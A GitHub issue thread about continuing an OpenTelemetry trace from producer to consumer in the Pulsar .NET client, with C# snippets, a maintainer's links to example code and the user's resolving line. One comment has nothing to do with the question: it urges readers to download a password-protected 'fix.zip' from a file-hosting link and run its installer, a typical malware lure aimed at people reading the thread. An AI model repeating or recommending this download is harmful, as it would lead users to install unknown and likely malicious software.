### ISSUE TITLE
How to continue the "Trace" from the "Producer"  after obtaining the messages by "Consumer. ReceiveAsync"

### ISSUE THREAD

**Issue by brotherhorse** [fsharplang-ru/pulsar-client-dotnet#277]
like this:
 
Messages<byte[]> msgs = await consumer.BatchReceiveAsync(cancellationToken).ConfigureAwait(false);
 
 using (var activity=Activity.Current?.Source.StartActivity("MyBusiness"))
 {
     activity?.SetTag("business", "mybusiness"); 
     _log.LogInformation("Hello world");     
 }

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by brotherhorse** [comment]
like this:

Messages<byte[]> msg = await consumer.ReceiveAsync(cancellationToken).ConfigureAwait(false);

using (var activity=Activity.Current?.Source.StartActivity("MyBusiness"))
{
activity?.SetTag("business", "mybusiness");
_log.LogInformation("Hello world");
}

**Comment by Lanayx** [comment]
Hi! You can check out [the example](https://github.com/fsprojects/pulsar-client-dotnet/blob/develop/examples/CsharpExamples/Telemetry.cs) and [the source code of the interceptor](https://github.com/fsprojects/pulsar-client-dotnet/blob/develop/src/Pulsar.Client.Otel/OtelConsumerInterceptor.fs).

**Comment by brotherhorse** [comment]
I Got it,
 var parentContext = Propagators.DefaultTextMapPropagator.Extract(default, p.Properties, Getter);
